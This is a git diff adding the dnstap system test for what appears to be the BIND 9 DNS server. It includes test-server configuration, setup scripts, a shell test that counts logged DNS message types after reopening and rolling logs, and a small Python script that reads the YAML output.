+server 10.53.0.1 { tcp-only yes; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/dnstap/prereq.sh b/bin/tests/system/dnstap/prereq.sh
new file mode 100644
index 0000000..f0748f3
--- /dev/null
+++ b/bin/tests/system/dnstap/prereq.sh
@@ -0,0 +1,20 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+. ../conf.sh
+
+$FEATURETEST --enable-dnstap || {
+ echo_i "This test requires dnstap support." >&2
+ exit 255
+}
+exit 0
diff --git a/bin/tests/system/dnstap/setup.sh b/bin/tests/system/dnstap/setup.sh
new file mode 100644
index 0000000..252d09e
--- /dev/null
+++ b/bin/tests/system/dnstap/setup.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+
+cp ns2/example.db.in ns2/example.db
diff --git a/bin/tests/system/dnstap/tests.sh b/bin/tests/system/dnstap/tests.sh
new file mode 100644
index 0000000..5ed8e73
--- /dev/null
+++ b/bin/tests/system/dnstap/tests.sh
@@ -0,0 +1,834 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+short -p ${PORT}" +RNDCCMD="$RNDC -p ${CONTROLPORT} -c ../common/rndc.conf" + +status=0 + +# dnstap_data_ready <fstrm_capture_PID> <capture_file> <min_file_size> +# Flushes capture_file and checks wheter its size is >= min_file_size. +dnstap_data_ready() { + # Process id of running fstrm_capture. + fstrm_capture_pid=$1 + # Output file provided to fstrm_capture via -w switch. + capture_file=$2 + # Minimum expected file size. + min_size_expected=$3 + + kill -HUP $fstrm_capture_pid + file_size=`wc -c < "$capture_file" | tr -d ' '` + if [ $file_size -lt $min_size_expected ]; then + return 1 + fi +} + + +for bad in bad-*.conf +do + ret=0 + echo_i "checking that named-checkconf detects error in $bad" + $CHECKCONF $bad > /dev/null 2>&1 + if [ $? != 1 ]; then echo_i "failed"; ret=1; fi + status=`expr $status + $ret` +done + +for good in good-*.conf +do + ret=0 + echo_i "checking that named-checkconf detects no error in $good" + $CHECKCONF $good > /dev/null 2>&1 + if [ $? 
!= 0 ]; then echo_i "failed"; ret=1; fi + status=`expr $status + $ret` +done + +echo_i "wait for servers to finish loading" +ret=0 +wait_for_log 20 "all zones loaded" ns1/named.run || ret=1 +wait_for_log 20 "all zones loaded" ns2/named.run || ret=1 +wait_for_log 20 "all zones loaded" ns3/named.run || ret=1 +wait_for_log 20 "all zones loaded" ns4/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# both the 'a.example/A' lookup and the './NS' lookup to ns1 +# need tocomplete before reopening/rolling for the counts to +# be correct. + +$DIG $DIGOPTS @10.53.0.3 a.example > dig.out +wait_for_log 20 "(./NS): query_reset" ns1/named.run || true + +# check three different dnstap reopen/roll methods: +# ns1: dnstap-reopen; ns2: dnstap -reopen; ns3: dnstap -roll +mv ns1/dnstap.out ns1/dnstap.out.save +mv ns2/dnstap.out ns2/dnstap.out.save + +if [ -n "$FSTRM_CAPTURE" ] ; then + ret=0 + echo_i "starting fstrm_capture" + $FSTRM_CAPTURE -t protobuf:dnstap.Dnstap -u ns4/dnstap.out \ + -w dnstap.out > fstrm_capture.out.1 2>&1 & + fstrm_capture_pid=$! + wait_for_log 10 "socket path ns4/dnstap.out" fstrm_capture.out.1 || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +$RNDCCMD -s 10.53.0.1 dnstap-reopen | sed 's/^/ns1 /' | cat_i +$RNDCCMD -s 10.53.0.2 dnstap -reopen | sed 's/^/ns2 /' | cat_i +$RNDCCMD -s 10.53.0.3 dnstap -roll | sed 's/^/ns3 /' | cat_i +$RNDCCMD -s 10.53.0.4 dnstap -reopen | sed 's/^/ns4 /' | cat_i + +$DIG $DIGOPTS @10.53.0.3 a.example > dig.out + +# send an UPDATE to ns2 +$NSUPDATE <<- EOF +server 10.53.0.2 ${PORT} +zone example +update add b.example 3600 in a 10.10.10.10 +send +EOF + +# XXX: file output should be flushed once a second according +# to the libfstrm source, but it doesn't seem to happen until +# enough data has accumulated. to get all the output, we stop +# the name servers, forcing a flush on shutdown. it would be +# nice to find a better way to do this. 
+$RNDCCMD -s 10.53.0.1 stop | sed 's/^/ns1 /' | cat_i +$RNDCCMD -s 10.53.0.2 stop | sed 's/^/ns2 /' | cat_i +$RNDCCMD -s 10.53.0.3 stop | sed 's/^/ns3 /' | cat_i + +sleep 1 + +echo_i "checking initial message counts" + +udp1=`$DNSTAPREAD ns1/dnstap.out.save | grep "UDP " | wc -l` +tcp1=`$DNSTAPREAD ns1/dnstap.out.save | grep "TCP " | wc -l` +aq1=`$DNSTAPREAD ns1/dnstap.out.save | grep "AQ " | wc -l` +ar1=`$DNSTAPREAD ns1/dnstap.out.save | grep "AR " | wc -l` +cq1=`$DNSTAPREAD ns1/dnstap.out.save | grep "CQ " | wc -l` +cr1=`$DNSTAPREAD ns1/dnstap.out.save | grep "CR " | wc -l` +rq1=`$DNSTAPREAD ns1/dnstap.out.save | grep "RQ " | wc -l` +rr1=`$DNSTAPREAD ns1/dnstap.out.save | grep "RR " | wc -l` +uq1=`$DNSTAPREAD ns1/dnstap.out.save | grep "UQ " | wc -l` +ur1=`$DNSTAPREAD ns1/dnstap.out.save | grep "UR " | wc -l` + +udp2=`$DNSTAPREAD ns2/dnstap.out.save | grep "UDP " | wc -l` +tcp2=`$DNSTAPREAD ns2/dnstap.out.save | grep "TCP " | wc -l` +aq2=`$DNSTAPREAD ns2/dnstap.out.save | grep "AQ " | wc -l` +ar2=`$DNSTAPREAD ns2/dnstap.out.save | grep "AR " | wc -l` +cq2=`$DNSTAPREAD ns2/dnstap.out.save | grep "CQ " | wc -l` +cr2=`$DNSTAPREAD ns2/dnstap.out.save | grep "CR " | wc -l` +rq2=`$DNSTAPREAD ns2/dnstap.out.save | grep "RQ " | wc -l` +rr2=`$DNSTAPREAD ns2/dnstap.out.save | grep "RR " | wc -l` +uq2=`$DNSTAPREAD ns2/dnstap.out.save | grep "UQ " | wc -l` +ur2=`$DNSTAPREAD ns2/dnstap.out.save | grep "UR " | wc -l` + +mv ns3/dnstap.out.0 ns3/dnstap.out.save +udp3=`$DNSTAPREAD ns3/dnstap.out.save | grep "UDP " | wc -l` +tcp3=`$DNSTAPREAD ns3/dnstap.out.save | grep "TCP " | wc -l` +aq3=`$DNSTAPREAD ns3/dnstap.out.save | grep "AQ " | wc -l` +ar3=`$DNSTAPREAD ns3/dnstap.out.save | grep "AR " | wc -l` +cq3=`$DNSTAPREAD ns3/dnstap.out.save | grep "CQ " | wc -l` +cr3=`$DNSTAPREAD ns3/dnstap.out.save | grep "CR " | wc -l` +rq3=`$DNSTAPREAD ns3/dnstap.out.save | grep "RQ " | wc -l` +rr3=`$DNSTAPREAD ns3/dnstap.out.save | grep "RR " | wc -l` +uq3=`$DNSTAPREAD ns3/dnstap.out.save | 
grep "UQ " | wc -l` +ur3=`$DNSTAPREAD ns3/dnstap.out.save | grep "UR " | wc -l` + +echo_i "checking UDP message counts" +ret=0 +[ $udp1 -eq 0 ] || { + echo_i "ns1 $udp1 expected 0" + ret=1 +} +[ $udp2 -eq 2 ] || { + echo_i "ns2 $udp2 expected 2" + ret=1 +} +[ $udp3 -eq 4 ] || { + echo_i "ns3 $udp3 expected 4" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TCP message counts" +ret=0 +[ $tcp1 -eq 6 ] || { + echo_i "ns1 $tcp1 expected 6" + ret=1 +} +[ $tcp2 -eq 2 ] || { + echo_i "ns2 $tcp2 expected 2" + ret=1 +} +[ $tcp3 -eq 6 ] || { + echo_i "ns3 $tcp3 expected 6" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AUTH_QUERY message counts" +ret=0 +[ $aq1 -eq 3 ] || { + echo_i "ns1 $aq1 exepcted 3" + ret=1 +} +[ $aq2 -eq 2 ] || { + echo_i "ns2 $aq2 expected 2" + ret=1 +} +[ $aq3 -eq 1 ] || { + echo_i "ns3 $aq3 expected 1" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AUTH_RESPONSE message counts" +ret=0 +[ $ar1 -eq 2 ] || { + echo_i "ns1 $ar1 expected 2" + ret=1 +} +[ $ar2 -eq 1 ] || { + echo_i "ns2 $ar2 expected 1" + ret=1 +} +[ $ar3 -eq 0 ] || { + echo_i "ns3 $ar3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking CLIENT_QUERY message counts" +ret=0 +[ $cq1 -eq 0 ] || { + echo_i "ns1 $cq1 expected 0" + ret=1 +} +[ $cq2 -eq 0 ] || { + echo_i "ns2 $cq2 expected 0" + ret=1 +} +[ $cq3 -eq 1 ] || { + echo_i "ns3 $cq3 expected 1" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking CLIENT_RESPONSE message counts" +ret=0 +[ $cr1 -eq 1 ] || { + echo_i "ns1 $cr1 expected 1" + ret=1 +} +[ $cr2 -eq 1 ] || { + echo_i "ns2 $cr2 expected 1" + ret=1 +} +[ $cr3 -eq 2 ] || { + echo_i "ns3 $cr3 expected 2" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i 
"checking RESOLVER_QUERY message counts" +ret=0 +[ $rq1 -eq 0 ] || { + echo_i "ns1 $rq1 expected 0" + ret=1 +} +[ $rq2 -eq 0 ] || { + echo_i "ns2 $rq2 expected 0" + ret=1 +} +[ $rq3 -eq 3 ] || { + echo_i "ns3 $rq3 expected 3" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking RESOLVER_RESPONSE message counts" +ret=0 +[ $rr1 -eq 0 ] || { + echo_i "ns1 $rr1 expected 0" + ret=1 +} +[ $rr2 -eq 0 ] || { + echo_i "ns2 $rr2 expected 0" + ret=1 +} +[ $rr3 -eq 3 ] || { + echo_i "ns3 $rr3 expected 3" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking UPDATE_QUERY message counts" +ret=0 +[ $uq1 -eq 0 ] || { + echo_i "ns1 $uq1 expected 0" + ret=1 +} +[ $uq2 -eq 0 ] || { + echo_i "ns2 $uq2 expected 0" + ret=1 +} +[ $uq3 -eq 0 ] || { + echo_i "ns3 $uq3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking UPDATE_RESPONSE message counts" +ret=0 +[ $ur1 -eq 0 ] || { + echo_i "ns1 $ur1 expected 0" + ret=1 +} +[ $ur2 -eq 0 ] || { + echo_i "ns2 $ur2 expected 0" + ret=1 +} +[ $ur3 -eq 0 ] || { + echo_i "ns3 $ur3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking reopened message counts" + +udp1=`$DNSTAPREAD ns1/dnstap.out | grep "UDP " | wc -l` +tcp1=`$DNSTAPREAD ns1/dnstap.out | grep "TCP " | wc -l` +aq1=`$DNSTAPREAD ns1/dnstap.out | grep "AQ " | wc -l` +ar1=`$DNSTAPREAD ns1/dnstap.out | grep "AR " | wc -l` +cq1=`$DNSTAPREAD ns1/dnstap.out | grep "CQ " | wc -l` +cr1=`$DNSTAPREAD ns1/dnstap.out | grep "CR " | wc -l` +rq1=`$DNSTAPREAD ns1/dnstap.out | grep "RQ " | wc -l` +rr1=`$DNSTAPREAD ns1/dnstap.out | grep "RR " | wc -l` +uq1=`$DNSTAPREAD ns1/dnstap.out | grep "UQ " | wc -l` +ur1=`$DNSTAPREAD ns1/dnstap.out | grep "UR " | wc -l` + +udp2=`$DNSTAPREAD ns2/dnstap.out | grep "UDP " | wc -l` +tcp2=`$DNSTAPREAD ns2/dnstap.out | grep "TCP " | wc -l` 
+aq2=`$DNSTAPREAD ns2/dnstap.out | grep "AQ " | wc -l` +ar2=`$DNSTAPREAD ns2/dnstap.out | grep "AR " | wc -l` +cq2=`$DNSTAPREAD ns2/dnstap.out | grep "CQ " | wc -l` +cr2=`$DNSTAPREAD ns2/dnstap.out | grep "CR " | wc -l` +rq2=`$DNSTAPREAD ns2/dnstap.out | grep "RQ " | wc -l` +rr2=`$DNSTAPREAD ns2/dnstap.out | grep "RR " | wc -l` +uq2=`$DNSTAPREAD ns2/dnstap.out | grep "UQ " | wc -l` +ur2=`$DNSTAPREAD ns2/dnstap.out | grep "UR " | wc -l` + +udp3=`$DNSTAPREAD ns3/dnstap.out | grep "UDP " | wc -l` +tcp3=`$DNSTAPREAD ns3/dnstap.out | grep "TCP " | wc -l` +aq3=`$DNSTAPREAD ns3/dnstap.out | grep "AQ " | wc -l` +ar3=`$DNSTAPREAD ns3/dnstap.out | grep "AR " | wc -l` +cq3=`$DNSTAPREAD ns3/dnstap.out | grep "CQ " | wc -l` +cr3=`$DNSTAPREAD ns3/dnstap.out | grep "CR " | wc -l` +rq3=`$DNSTAPREAD ns3/dnstap.out | grep "RQ " | wc -l` +rr3=`$DNSTAPREAD ns3/dnstap.out | grep "RR " | wc -l` +uq3=`$DNSTAPREAD ns3/dnstap.out | grep "UQ " | wc -l` +ur3=`$DNSTAPREAD ns3/dnstap.out | grep "UR " | wc -l` + +echo_i "checking UDP message counts" +ret=0 +[ $udp1 -eq 0 ] || { + echo_i "ns1 $udp1 expected 0" + ret=1 +} +[ $udp2 -eq 2 ] || { + echo_i "ns2 $udp2 expected 2" + ret=1 +} +[ $udp3 -eq 2 ] || { + echo_i "ns3 $udp3 expected 2" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TCP message counts" +ret=0 +[ $tcp1 -eq 0 ] || { + echo_i "ns1 $tcp1 expected 0" + ret=1 +} +[ $tcp2 -eq 0 ] || { + echo_i "ns2 $tcp2 expected 0" + ret=1 +} +[ $tcp3 -eq 0 ] || { + echo_i "ns3 $tcp3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AUTH_QUERY message counts" +ret=0 +[ $aq1 -eq 0 ] || { + echo_i "ns1 $aq1 exepcted 0" + ret=1 +} +[ $aq2 -eq 0 ] || { + echo_i "ns2 $aq2 expected 0" + ret=1 +} +[ $aq3 -eq 0 ] || { + echo_i "ns3 $aq3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AUTH_RESPONSE message counts" 
+ret=0 +[ $ar1 -eq 0 ] || { + echo_i "ns1 $ar1 expected 0" + ret=1 +} +[ $ar2 -eq 0 ] || { + echo_i "ns2 $ar2 expected 0" + ret=1 +} +[ $ar3 -eq 0 ] || { + echo_i "ns3 $ar3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking CLIENT_QUERY message counts" +ret=0 +[ $cq1 -eq 0 ] || { + echo_i "ns1 $cq1 expected 0" + ret=1 +} +[ $cq2 -eq 0 ] || { + echo_i "ns2 $cq2 expected 0" + ret=1 +} +[ $cq3 -eq 1 ] || { + echo_i "ns3 $cq3 expected 1" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking CLIENT_RESPONSE message counts" +ret=0 +[ $cr1 -eq 0 ] || { + echo_i "ns1 $cr1 expected 0" + ret=1 +} +[ $cr2 -eq 0 ] || { + echo_i "ns2 $cr2 expected 0" + ret=1 +} +[ $cr3 -eq 1 ] || { + echo_i "ns3 $cr3 expected 1" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking RESOLVER_QUERY message counts" +ret=0 +[ $rq1 -eq 0 ] || { + echo_i "ns1 $rq1 expected 0" + ret=1 +} +[ $rq2 -eq 0 ] || { + echo_i "ns2 $rq2 expected 0" + ret=1 +} +[ $rq3 -eq 0 ] || { + echo_i "ns3 $rq3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking RESOLVER_RESPONSE message counts" +ret=0 +[ $rr1 -eq 0 ] || { + echo_i "ns1 $rr1 expected 0" + ret=1 +} +[ $rr2 -eq 0 ] || { + echo_i "ns2 $rr2 expected 0" + ret=1 +} +[ $rr3 -eq 0 ] || { + echo_i "ns3 $rr3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking UPDATE_QUERY message counts" +ret=0 +[ $uq1 -eq 0 ] || { + echo_i "ns1 $uq1 expected 0" + ret=1 +} +[ $uq2 -eq 1 ] || { + echo_i "ns2 $uq2 expected 1" + ret=1 +} +[ $uq3 -eq 0 ] || { + echo_i "ns3 $uq3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking UPDATE_RESPONSE message counts" +ret=0 +[ $ur1 -eq 0 ] || { + echo_i "ns1 $ur1 expected 0" + ret=1 +} +[ 
$ur2 -eq 1 ] || { + echo_i "ns2 $ur2 expected 1" + ret=1 +} +[ $ur3 -eq 0 ] || { + echo_i "ns3 $ur3 expected 0" + ret=1 +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking whether destination UDP port is logged for client queries" +ret=0 +$DNSTAPREAD ns3/dnstap.out.save | grep -Eq "CQ [0-9:.]+ -> 10.53.0.3:${PORT} UDP" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +HAS_PYYAML=0 +if [ -n "$PYTHON" ] ; then + $PYTHON -c "import yaml" 2> /dev/null && HAS_PYYAML=1 +fi + +if [ $HAS_PYYAML -ne 0 ] ; then + echo_i "checking dnstap-read YAML output" + ret=0 + { + $PYTHON ydump.py "$DNSTAPREAD" "ns3/dnstap.out.save" > ydump.out || ret=1 + } | cat_i + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "checking dnstap-read hex output" +ret=0 +hex=`$DNSTAPREAD -x ns3/dnstap.out | tail -1` +echo $hex | $WIRETEST > dnstap.hex +grep 'status: NOERROR' dnstap.hex > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 3, AUTHORITY: 1' dnstap.hex > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if [ -n "$FSTRM_CAPTURE" ] ; then + $DIG $DIGOPTS @10.53.0.4 a.example > dig.out + + # send an UPDATE to ns4 + $NSUPDATE <<- EOF > nsupdate.out 2>&1 + server 10.53.0.4 ${PORT} + zone example + update add b.example 3600 in a 10.10.10.10 + send +EOF + grep "update failed: NOTAUTH" nsupdate.out > /dev/null || ret=1 + + echo_i "checking unix socket message counts" + sleep 2 + retry_quiet 5 dnstap_data_ready $fstrm_capture_pid dnstap.out 450 || { + echo_i "dnstap output file smaller than expected" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + kill $fstrm_capture_pid + wait + udp4=`$DNSTAPREAD dnstap.out | grep "UDP " | wc -l` + tcp4=`$DNSTAPREAD dnstap.out | grep "TCP " | wc -l` + aq4=`$DNSTAPREAD dnstap.out | grep "AQ " | wc -l` + ar4=`$DNSTAPREAD dnstap.out | grep "AR " | wc -l` + 
cq4=`$DNSTAPREAD dnstap.out | grep "CQ " | wc -l` + cr4=`$DNSTAPREAD dnstap.out | grep "CR " | wc -l` + rq4=`$DNSTAPREAD dnstap.out | grep "RQ " | wc -l` + rr4=`$DNSTAPREAD dnstap.out | grep "RR " | wc -l` + uq4=`$DNSTAPREAD dnstap.out | grep "UQ " | wc -l` + ur4=`$DNSTAPREAD dnstap.out | grep "UR " | wc -l` + + echo_i "checking UDP message counts" + ret=0 + [ $udp4 -eq 4 ] || { + echo_i "ns4 $udp4 expected 4" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking TCP message counts" + ret=0 + [ $tcp4 -eq 0 ] || { + echo_i "ns4 $tcp4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking AUTH_QUERY message counts" + ret=0 + [ $aq4 -eq 0 ] || { + echo_i "ns4 $aq4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking AUTH_RESPONSE message counts" + ret=0 + [ $ar4 -eq 0 ] || { + echo_i "ns4 $ar4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking CLIENT_QUERY message counts" + ret=0 + [ $cq4 -eq 1 ] || { + echo_i "ns4 $cq4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking CLIENT_RESPONSE message counts" + ret=0 + [ $cr4 -eq 1 ] || { + echo_i "ns4 $cr4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking RESOLVER_QUERY message counts" + ret=0 + [ $rq4 -eq 0 ] || { + echo_i "ns4 $rq4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking RESOLVER_RESPONSE message counts" + ret=0 + [ $rr4 -eq 0 ] || { + echo_i "ns4 $rr4 expected 0" + ret=1 + } + + echo_i "checking UPDATE_QUERY message counts" + ret=0 + [ $uq4 -eq 1 ] || { + echo_i "ns4 $uq4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + 
status=`expr $status + $ret` + + echo_i "checking UPDATE_RESPONSE message counts" + ret=0 + [ $ur4 -eq 1 ] || { + echo_i "ns4 $ur4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + mv dnstap.out dnstap.out.save + + echo_i "restarting fstrm_capture" + $FSTRM_CAPTURE -t protobuf:dnstap.Dnstap -u ns4/dnstap.out \ + -w dnstap.out > fstrm_capture.out.2 2>&1 & + fstrm_capture_pid=$! + wait_for_log 10 "socket path ns4/dnstap.out" fstrm_capture.out.2 || { + echo_i "failed" + ret=1 + } + $RNDCCMD -s 10.53.0.4 dnstap -reopen | sed 's/^/ns4 /' | cat_i + $DIG $DIGOPTS @10.53.0.4 a.example > dig.out + + echo_i "checking reopened unix socket message counts" + sleep 2 + retry_quiet 5 dnstap_data_ready $fstrm_capture_pid dnstap.out 270 || { + echo_i "dnstap output file smaller than expected" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) + kill $fstrm_capture_pid + wait + udp4=`$DNSTAPREAD dnstap.out | grep "UDP " | wc -l` + tcp4=`$DNSTAPREAD dnstap.out | grep "TCP " | wc -l` + aq4=`$DNSTAPREAD dnstap.out | grep "AQ " | wc -l` + ar4=`$DNSTAPREAD dnstap.out | grep "AR " | wc -l` + cq4=`$DNSTAPREAD dnstap.out | grep "CQ " | wc -l` + cr4=`$DNSTAPREAD dnstap.out | grep "CR " | wc -l` + rq4=`$DNSTAPREAD dnstap.out | grep "RQ " | wc -l` + rr4=`$DNSTAPREAD dnstap.out | grep "RR " | wc -l` + uq4=`$DNSTAPREAD dnstap.out | grep "UQ " | wc -l` + ur4=`$DNSTAPREAD dnstap.out | grep "UR " | wc -l` + + echo_i "checking UDP message counts" + ret=0 + [ $udp4 -eq 2 ] || { + echo_i "ns4 $udp4 expected 2" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking TCP message counts" + ret=0 + [ $tcp4 -eq 0 ] || { + echo_i "ns4 $tcp4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking AUTH_QUERY message counts" + ret=0 + [ $aq4 -eq 0 ] || { + echo_i "ns4 $aq4 expected 0" + ret=1 + } + if [ $ret 
!= 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking AUTH_RESPONSE message counts" + ret=0 + [ $ar4 -eq 0 ] || { + echo_i "ns4 $ar4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking CLIENT_QUERY message counts" + ret=0 + [ $cq4 -eq 1 ] || { + echo_i "ns4 $cq4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking CLIENT_RESPONSE message counts" + ret=0 + [ $cr4 -eq 1 ] || { + echo_i "ns4 $cr4 expected 1" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking RESOLVER_QUERY message counts" + ret=0 + [ $rq4 -eq 0 ] || { + echo_i "ns4 $rq4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking RESOLVER_RESPONSE message counts" + ret=0 + [ $rr4 -eq 0 ] || { + echo_i "ns4 $rr4 expected 0" + ret=1 + } + + echo_i "checking UPDATE_QUERY message counts" + ret=0 + [ $uq4 -eq 0 ] || { + echo_i "ns4 $uq4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + + echo_i "checking UPDATE_RESPONSE message counts" + ret=0 + [ $ur4 -eq 0 ] || { + echo_i "ns4 $ur4 expected 0" + ret=1 + } + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "checking large packet printing" +ret=0 +# Expect one occurrence of "opcode: QUERY" below "reponse_message_data" and +# another one below "response_message". 
+lines=`$DNSTAPREAD -y large-answer.fstrm | grep -c "opcode: QUERY"` +[ $lines -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +test_dnstap_roll() ( + ip="$1" + ns="$2" + n="$3" + $RNDCCMD -s "${ip}" dnstap -roll "${n}" | sed "s/^/${ns} /" | cat_i && + files=$(find "$ns" -name "dnstap.out.[0-9]" | wc -l) && + test "$files" -le "${n}" && test "$files" -ge "1" +) + +echo_i "checking 'rndc -roll <value>' (no versions)" +ret=0 +start_server --noclean --restart --port "${PORT}" ns3 +_repeat 5 test_dnstap_roll 10.53.0.3 ns3 3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking 'rndc -roll <value>' (versions)" +ret=0 +start_server --noclean --restart --port "${PORT}" ns2 +_repeat 5 test_dnstap_roll 10.53.0.2 ns2 3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ "$status" -eq 0 ] || exit 1 diff --git a/bin/tests/system/dnstap/ydump.py b/bin/tests/system/dnstap/ydump.py new file mode 100644 index 0000000..ab7e3c9 --- /dev/null +++ b/bin/tests/system/dnstap/ydump.py @@ -0,0 +1,29 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import sys + +try: + import yaml +except (ModuleNotFoundError, ImportError): + print("No python yaml module, skipping") + sys.exit(1) + +import subprocess +import pprint + +DNSTAP_READ = sys.argv[1] +DATAFILE = sys.argv[2] +ARGS = [DNSTAP_READ, "-y", DATAFILE] + +with subprocess.Popen(ARGS, stdout=subprocess.PIPE) as f: + for y in yaml.load_all(f.stdout, Loader=yaml.SafeLoader): + pprint.pprint(y) 